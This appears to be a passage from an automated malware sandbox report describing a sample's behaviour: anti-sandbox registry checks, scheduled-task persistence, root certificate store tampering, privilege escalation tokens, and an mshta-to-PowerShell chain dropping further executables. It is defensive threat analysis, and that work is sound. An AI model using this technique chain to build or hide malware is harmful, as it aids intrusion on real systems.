\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language laf6w_001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d91c7611.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString advnrNo.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 8428 timeout.exe 10884 timeout.exe 6080 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 6 IoCs
pid Process 13924 taskkill.exe 13864 taskkill.exe 3156 taskkill.exe 3356 taskkill.exe 12648 taskkill.exe 14040 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133872805000093494" chrome.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 9076 reg.exe 8832 reg.exe 4760 reg.exe 9220 reg.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7184 schtasks.exe 9312 schtasks.exe 3744 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4584 powershell.exe 4584 powershell.exe 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 4304 rapes.exe 4304 rapes.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 4584 MSBuild.exe 4584 MSBuild.exe 4584 MSBuild.exe 4584 MSBuild.exe 6024 advnrNo.exe 6024 advnrNo.exe 380 chrome.exe 380 chrome.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1456 fontdrvhost.exe 1456 fontdrvhost.exe 1456 fontdrvhost.exe 1456 fontdrvhost.exe 6024 advnrNo.exe 6024 advnrNo.exe 4688 MSBuild.exe 4688 MSBuild.exe 4688 MSBuild.exe 4688 MSBuild.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6840 powershell.exe 6840 powershell.exe 6840 powershell.exe 6024 advnrNo.exe 6024 advnrNo.exe 1236 rapes.exe 1236 rapes.exe 7312 powershell.exe 7312 powershell.exe 7312 powershell.exe 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 8288 powershell.exe 8288 powershell.exe 8288 powershell.exe 8708 powershell.exe 8708 powershell.exe 8708 powershell.exe 12132 d91c7611.exe -
Suspicious behavior: LoadsDriver 7 IoCs
pid Process 2040 tzutil.exe 660 Process not Found 660 Process not Found 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 672 y0u3d_003.exe 672 y0u3d_003.exe 672 y0u3d_003.exe 10824 laf6w_001.exe 10824 laf6w_001.exe 10824 laf6w_001.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 13012 msedge.exe 13012 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 1780 tasklist.exe Token: SeDebugPrivilege 1656 tasklist.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeLoadDriverPrivilege 2040 tzutil.exe Token: SeDebugPrivilege 6840 powershell.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeBackupPrivilege 12132 d91c7611.exe Token: SeRestorePrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeShutdownPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeBackupPrivilege 12132 d91c7611.exe Token: SeRestorePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeCreatePermanentPrivilege 12132 d91c7611.exe Token: SeShutdownPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeSystemProfilePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeMachineAccountPrivilege 12132 d91c7611.exe Token: SeCreateTokenPrivilege 12132 d91c7611.exe Token: SeAssignPrimaryTokenPrivilege 12132 d91c7611.exe Token: SeTcbPrivilege 12132 d91c7611.exe Token: SeAuditPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeSystemProfilePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeMachineAccountPrivilege 12132 d91c7611.exe Token: SeCreateTokenPrivilege 12132 d91c7611.exe Token: SeAssignPrimaryTokenPrivilege 12132 d91c7611.exe Token: SeTcbPrivilege 12132 d91c7611.exe Token: SeAuditPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 7312 powershell.exe Token: SeDebugPrivilege 8288 powershell.exe Token: SeDebugPrivilege 8708 powershell.exe Token: SeDebugPrivilege 9028 powershell.exe Token: SeDebugPrivilege 9460 powershell.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 13012 msedge.exe 3228 32ae679328.exe 3228 32ae679328.exe 3228 32ae679328.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 3228 32ae679328.exe 3228 32ae679328.exe 3228 32ae679328.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 824 4304 rapes.exe 126 PID 4304 wrote to memory of 824 4304 rapes.exe 126 PID 824 wrote to memory of 1136 824 OkH8IPF.exe 128 PID 824 wrote to memory of 1136 824 OkH8IPF.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2580
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"1⤵
- System Location Discovery: System Language Discovery
